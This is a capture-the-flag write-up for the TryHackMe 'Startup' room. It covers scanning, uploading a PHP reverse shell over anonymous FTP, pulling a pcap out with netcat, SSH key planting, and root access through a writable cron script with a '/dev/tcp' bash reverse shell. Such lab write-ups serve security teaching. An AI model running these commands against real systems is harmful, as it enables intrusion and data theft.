Startup V1.3 CTF WriteUp
by Zebra
Room | Date | Difficulty | Type | Time | Own Intention | Machine |
---|---|---|---|---|---|---|
Startup | 10.11.2020 | Easy | Challenge | 1,0h | Easy | Linux |
Tasks
Task | Question |
---|---|
Task 1.1 | What is the secret spicy soup recipe? |
Task 1.2 | What are the contents of user.txt? |
Task 1.3 | What are the contents of root.txt? |
Task 2.1 | Autocomplete |
Introduction
Hello and welcome to the write-up of the room “Startup” on tryhackme.
Startup is a room marked as easy and in my opinion its also an easy one. After the scanning path we enumerate the ftp and find a way to upload a reverse shell. With access to the system we could find the secret spicy and try to escalate over a user to root. For the escalation we have to analyze a wireshark file to take get some credentials. For escalating from user to root a script in the home system is needed.
So let’s begin:
Preparation Steps
1 2 3 4 5 6 7 8 mkdir startup #New Room folder cd startup #Move into folder mkdir nmap #Nmap directory mkdir gobuster #Gobuster directory sudo nano /etc /hosts #$ip startup.thm export target=10.10.179.244 export golist=/usr/share/seclists/Discovery/Web-Content/common.txt export rockyou=/usr/share/wordlists/rockyou.txt
Scanning and Enumeration
Lets begin with a standard nmap scan for common ports. After that check all ports for don’t let a port pass out of our attention.
Nmap Scan
- Nmap initial scan
- Nmap all ports check
- If necessary fire up a all port scan.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
nmap -sC -sV -oN ./nmap/initial target.thm
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-10 17:02 CET
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 09 02:12 ftp [NSE: writeable]
|_-rw-r--r-- 1 0 0 208 Nov 09 02:12 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.11.19.12
| Logged in as ftp
| TYPE: ASCII
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 42:67:c9:25:f8:04:62:85:4c:00:c0:95:95:62:97:cf (RSA)
| 256 dd:97:11:35:74:2c:dd:e3:c1:75:26:b1:df:eb:a4:82 (ECDSA)
|_ 256 27:72:6c:e1:2a:a5:5b:d2:6a:69:ca:f9:b9:82:2c:b9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
#-sC = Scan with default NSE scripts.
#-sV = Attempts to determine the version of the service running on port.
#-oN = Normal output to the file.
Port | Service | Information’s |
---|---|---|
21/tcp | ftp | vsftpd 3.0.3, anonymous login |
22/tcp | ssh | OpenSSH 7.2p2 |
80/tcp | http | Apache/2.4.18 (Ubuntu) |
Web Enumeration
Visite web-pages:
Firefox: target.thm
After checking the source code nothing interesting.
Web directory enumeration:
We could use one of our preferred tools like dirbuster, gobuster or dirsearch. I will use dirsearch.
1. Scan:
python3 ~/tools/dirsearch/dirsearch.py -u http://target.thm -e php,html,txt
2. Scan:
python3 ~/tools/dirsearch/dirsearch.py -u http://target.thm/files/ -e php,html,txt
Output:
Path | type | priority | information |
---|---|---|---|
/index.html | html file | low | a few information about the startup |
/files | file share r | medium | files to download |
/files/ftp | file share rw | high | files hare with write access a |
Check Web directories:
Firefox: target.thm/files
Open: target.thm/files/notice.txt and download with wget http://target.thm/files/notice.txt
. Perhaps we need that later.
Hints: Possible username “maya”. Saved to file usernames.txt on local machine
Ftp enumeration
Our nmap scan show an ftp service running on port 21 with anonymous login and writeable access. So check intensively the nmap scan.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
ftp target.thm
Connected to target.thm.
Name (target.thm:kali): anonymous
Password:
230 Login successful.
ftp> ls
drwxrwxrwx 2 65534 65534 4096 Nov 09 02:12 ftp
-rw-r--r-- 1 0 0 208 Nov 09 02:12 notice.txt
ftp> get notice.txt
226 Transfer complete.
ftp> cd ftp
250 Directory successfully changed.
ftp> ls -la
drwxrwxrwx 2 65534 65534 4096 Nov 09 02:12 .
drwxr-xr-x 3 65534 65534 4096 Nov 09 02:12 ..
The possibility to write files into the ftp directory is a great opportunity to get an exploit running.
Lets check pentestmonkey to get a file to upload on the web server.
Download the php reverse shell and change the $ip to $LHOST and the $port to $LPORT.
Exploitation
Rev shell upload
Login to ftp again and upload the rev-shell named shell.php to the server.
1
2
3
4
5
6
7
8
9
10
11
Connected to target.thm.
230 Login successful.
ftp> cd ftp
ftp> put shell.php
local: shell.php remote: shell.php
226 Transfer complete.
ftp> ls
-rwxrwxr-x 1 112 118 5492 Nov 10 16:26 shell.php
Upload sucessfully done. Lets run a netcat listener and trigger the reverse shell.
Listener: nc -lnvp 9001
Firefox: target.thm/files/ftp/shell.php
Bingo! Upgrade: python -c 'import pty;pty.spawn("/bin/bash")'
,
export SHELL=bash
and
export TERM=xterm-256color
.
System enumeration
Checkout the actual directory with pwd
and have a look at the file we could read, write or execute with ls-la
. We find a file name rexxxx.txt. Cat that out and get the answer for task 1.1.
### Task 1.1 solved ###
Next interesting file or directory will be incidents. We find a file named suspicious.pcapng.
Pcapng files are files for wireshark.
Let download this file via netcat:
Local: nc -l -p 1234 > suspicious.pcapng
Target: nc -w 3 $LHOST 1234 < suspicious.pcapng
Check md5sum: md5sum suspicious.pcapng
(if it matches you are good, if not do -w 5 on target netcat command)
Wireshark enumeration:
Open wireshark and load the downloaded file.
Mark the first log file and scroll through with the down arrow key. At the bottom of wireshark you see on the left side the output of hex and on the right side parts of stings. So have a look at the string, when your scroll through. After file number 152 we could see that a user name lxxxx are at his home directory at try to open folder or files. He stuck at the point “he had no permissions” and get a command sudo-l. Now we get closer, cause he had to input his password! The string 177 give us the password and we saved it to our local credential file named creds.txt with the echo lxxxx:xxxxxxxxxxx > creds.txt
.
Privilege escalation:
Escalate to User:
With our credentials out of wireshark we could change to user of our reverse shell from www-date to lxxxx with su lxxxxx
.
Now we escalate to a higher user. At this point I often check first for ssh to get a better connection.
ssh connection for user User:
!!!#Spoileralert# From now on i dont hide the username. !!!
@local:
ssh-keygen
name = lennie_rsa, other inputs all check with enter sudo python -m SimpleHTTPServer 4444
@target.thm:
cd
#go to home directory mkdir .ssh
, cd .ssh
wget http://10.11.19.12:4444/lenni_rsa.pub
wget http://10.11.19.12:4444/lenni_rsa
echo "$(cat lenni_rsa.pub)" > authorized_keys
@local chmod +x lennie_rsa
ssh -i lennie_rsa lennie@target.thm
@target: shell upgrade.
With the new ssh access we could further enumerate the system.
Cat our the user flag cat /home/lennie/user.txt
### Task 1.2 solved ###
Privilege escalation
Tool upload and runninng
For priv esc i often use the too linpeas and pspy. So lets upload this into temp and run.
Download the tools and upload them via webserver or netcat and set the execute flag with chmod +x
.
@target /tmp/
linpeas: ./linpeas.sh | tee lin.og
pspy64: ./pspy64
Linpeas output:
With linpeas we find a vulnerable kernel version which could be exploited. So run searchsploit on the version an find the priv esv compiled file. Upload it and ….
FAIL! No gcc on the system. We need another solution.
Start pspy64 and check the processes out.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/11/10 17:12:43 CMD: UID=33 PID=1217 | /usr/sbin/apache2 -k start
2020/11/10 17:12:43 CMD: UID=33 PID=1215 | /usr/sbin/apache2 -k start
2020/11/10 17:12:43 CMD: UID=0 PID=1210 | /usr/sbin/apache2 -k start
2020/11/10 17:12:43 CMD: UID=0 PID=12 |
2020/11/10 17:12:43 CMD: UID=0 PID=1189 | /sbin/agetty --noclear tty1 linux
2020/11/10 17:12:43 CMD: UID=0 PID=1183 | /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
2020/11/10 17:12:43 CMD: UID=0 PID=11 |
2020/11/10 17:12:43 CMD: UID=0 PID=1079 | /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
2020/11/10 17:12:43 CMD: UID=0 PID=1078 | /usr/lib/policykit-1/polkitd --no-debug
2020/11/10 17:12:43 CMD: UID=0 PID=1071 | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
2020/11/10 17:12:43 CMD: UID=0 PID=1059 | /usr/sbin/sshd -D
2020/11/10 17:12:43 CMD: UID=0 PID=1054 | /usr/sbin/vsftpd /etc/vsftpd.conf
2020/11/10 17:12:43 CMD: UID=0 PID=1031 | /usr/sbin/cron -f
2020/11/10 17:12:43 CMD: UID=0 PID=1028 | /lib/systemd/systemd-logind
2020/11/10 17:12:43 CMD: UID=0 PID=1022 | /usr/lib/accountsservice/accounts-daemon
2020/11/10 17:12:43 CMD: UID=0 PID=10 |
2020/11/10 17:12:43 CMD: UID=0 PID=1 | /sbin/init
2020/11/10 17:13:01 CMD: UID=0 PID=2373 | /bin/bash /home/lennie/scripts/planner.sh
2020/11/10 17:13:01 CMD: UID=0 PID=2372 | /bin/sh -c /home/lennie/scripts/planner.sh
2020/11/10 17:13:01 CMD: UID=0 PID=2371 | /usr/sbin/CRON -f
2020/11/10 17:13:01 CMD: UID=0 PID=2374 | /bin/bash /home/lennie/scripts/planner.sh
2020/11/10 17:15:01 CMD: UID=0 PID=2382 |
2020/11/10 17:15:01 CMD: UID=0 PID=2381 | /bin/bash /home/lennie/scripts/planner.sh
2020/11/10 17:15:01 CMD: UID=0 PID=2380 | /bin/sh -c /home/lennie/scripts/planner.sh
2020/11/10 17:15:01 CMD: UID=0 PID=2379 | /usr/sbin/CRON -f
We could see an interesting process with runs /bin/bash /home/lennie/scripts/planner.sh out of our home directory.
Escalate to root:
First got to the directory called /home/lennie/scripts/ and look at the permissions.
1
2
3
4
5
6
7
ls -la /home/lennie/scripts/
total 16
drwxr-xr-x 2 root root 4096 Nov 9 02:13 .
drwx------ 6 lennie lennie 4096 Nov 10 16:56 ..
-rwxr-xr-x 1 root root 77 Nov 9 02:12 planner.sh
-rw-r--r-- 1 root root 1 Nov 10 17:19 startup_list.txt
We see that we only could read the file. Do this.
1
2
3
4
lennie@startup:~/scripts$ cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
-> The planner.sh execute another file called print.sh. Check that out
We are owner of this file so we could change the content and could upload an exploit. Do this with nano /etc/print.sh
and upload a rev shell bash command out of pentestmokey.
bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1
@local:
Start a netcat listener on port 9001 and wait.
nc -lnvp 9001
.
BOOOM! Root.
cat /root/root.txt
### Task 1.3 solved ###
What we learned:
- Web enumeration with dirsearch
- ftp enumeration with ftp and exploit with write permissions
- Analyze wireshark files
- Use pspy and exploit by scheduled scripts.